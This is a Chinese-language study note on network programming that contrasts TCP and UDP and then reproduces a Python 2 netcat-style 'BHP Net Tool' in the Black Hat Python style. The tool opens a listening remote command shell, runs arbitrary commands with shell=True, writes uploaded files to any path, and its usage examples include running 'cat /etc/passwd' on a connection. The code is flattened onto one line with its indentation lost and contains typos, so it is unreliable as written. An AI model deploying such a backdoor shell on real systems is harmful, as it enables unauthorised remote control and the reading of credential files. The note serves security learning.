操作系统:kail32位
第二章:网络编程
tcp(传输控制协议):面向连接,通讯时创造一条连接,提供顺序的可靠地,不重复的数据传输,不会被加上数据边界,每个发送的消息,可能会拆成很多份,每一份会不多不少的到达目的地,然后按照一定的顺序拼接起来,传给正在等待的应用程序
UDP:无连接,数据是整个发送,具有数据边界,数据到达的顺序、可靠性及不重复性无法保证
创建一个netcat工具:
1)导入模块,定义全局变量,
subprocess:提供强大的进程创建借口,可以提供多种与客户端交互的方法
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Sun Jul 2 04:24:51 2017 @author: root """ import sys import socket import getopt import threading import subprocess # define the global arg listen = False command = False upload = False execute = "" target = "" upload_destination = "" port = 0 def usage(): print "BHP Net Tool" print print "Usage:bhpnet.py -t target_host -p port" print "-l --listen -listen on [host]:[port] for incoming connect" print "-e --execute = file_to_run -execute the given file upon receiving a connection" print "-c --command -- initialize a commend shell" print "-u --upload = destination -upon receiving connecction upload file and write to [destination]" print print print "examples:" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"" print "echo 'ABCDEFG' | ./bhpnet.py -t 192.168.11.12 -p 135" sys.exit(0) def main(): global listen global port global execute global command global upload_destination global target if not len(sys.argv[1:]): usage() try: opts,args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"]) print opts except getopt.GetoptError as err: print str(err) usage() for o,a in opts: if o in ("-h","help"): usage() elif o in("-l","--listen"): listen = True elif o in("-e","--execute"): execute = a elif o in ("-c","--commadnshell"): command = True elif o in ("-u","--upload"): upload_destination = a elif o in ("-t","--target"): target = a elif o in("-p","--port"): port = int(a) else: assert False,"unhandled option" def client_sender(buffer): client = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: client.connect((target,port)) if len(buffer): client.send(buffer) while True: recv_len = 1 response = "" while recv_len: data =client.recv(4096) recv_len = len(data) response += data if recv_len <4096: break print response, buffer = raw_input("") buffer += "\n" client.send(buffer) except: print "[*] Exception exiting." client.close() def server_loop(): global target if not len(target): target = "0.0.0.0" server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) server.bind((target,port)) server.listen(5) while True: client_socket,addr = server.accept() client_thread = threading.Thread(target=client_handler,args=(client_socket,)) client_thread.start() def run_command(command): command = command.rstrip() try: output = subprocess.check_output(command,stderr=subprocess.STDOUT,shell=True) except: output = "faile to exectue command \r\n" return output def client_handler(client_socket): global upload global execute global command if len(upload_destination): file_buffer = "" while True: data = client_socket.recv(1024) if not data: break else: file_buffer += data try: file_descriptor = open(upload_destination,"w") file_descriptor.write(file_buffer) file_descriptor.close() client_socket.send("successfully saved file %s\r\n"%upload_destination) except: client_socket.send("Failed to save file to %s\r\n"%upload_destination) if len(execute): output = run_command(execute) client_socket.send(output) if command: while True: client_socket.send("<BHP:#>") cmd_buffer = "" while "\n" not in cmd_buffer: cmd_buffer += client_socket.recv(1024) response = run_command(cmd_buffer) client_socket.send(response) if not listen and len(target) and port >0: buffer = sys.stdin.read() client_sender(buffer) if listen: server_loop() main()